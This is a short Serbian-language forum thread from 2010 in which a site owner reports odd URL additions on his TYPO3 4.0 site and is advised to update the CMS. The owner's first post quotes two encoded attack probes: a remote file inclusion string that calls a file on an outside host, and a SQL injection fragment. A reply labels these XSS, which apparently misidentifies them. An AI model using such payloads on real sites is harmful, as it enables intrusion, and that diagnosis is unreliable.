[ nowa @ 14.09.2010. 15:09 ] @
|
| Zdravo,
U poslednjih par dana cesto mi se desava da na mom web sajtu linkovi cudno izgledaju, tacnije imaju "dodatak", npr:
%2F%3Fid%3Dhttp%3A%2F%2Ftjdhosp.co.kr%2Fdata%2Fsession%2Fbyz9991.txt%3F%3F%3F
ili
%20and%200%3D1%20union%20select%20
Dodaci na linkovima uglavnom nestanu prilikom reload-a, i pojave se na nekoj drugoj stranici.
Prilicno sam siguran da nije problem do koda u mom sajtu, a kako sajt tjdhosp.co.kr iz gornjeg URL-a zaista postoji, pretpostavljam da je moj sajt izlozen nekoj vrsti napada.
Na sta vam ovo lici i koje korake treba da preduzmem?
Hvala,
Ivan
|
[ maksvel @ 14.09.2010. 16:05 ] @
Liči na posledice nekog XSS-a...
Ako je gotov cms, apdejtuj.
Ako si sam pravio, pregledaj proveru unosa korisnika.
[ nowa @ 15.09.2010. 07:54 ] @
Da, to je gotov CMS.
Da li napad te vrste ostavlja posledice u bazi, pa bi trebalo pocistiti neke tabele, ili je update dovoljan?
Hvala na pomoci!
Ivan
[ maksvel @ 15.09.2010. 09:45 ] @
Mislim da je to moguće...
Bilo bi dobro da napišeš koji je konkretno cms i koja je verzija, kao i da li je shared ili dedicated hosting: sigurno na netu postoje informacije o mogućim problemima sa npr. Joomlom tom-i-tom ili Wordpressom ili šta već koristiš.
[ nowa @ 15.09.2010. 10:16 ] @
CMS je TYPO3 verzija 4.0. Dokumentacija ukazuje na XSS probleme sa starijim verzijama (najsvezija je 4.4).
Updatovacu ga, samo mi je trebala sugestija u cemu je problem.
Hvala na pomoci!
Ivan
Copyright (C) 2001-2024 by www.elitesecurity.org. All rights reserved.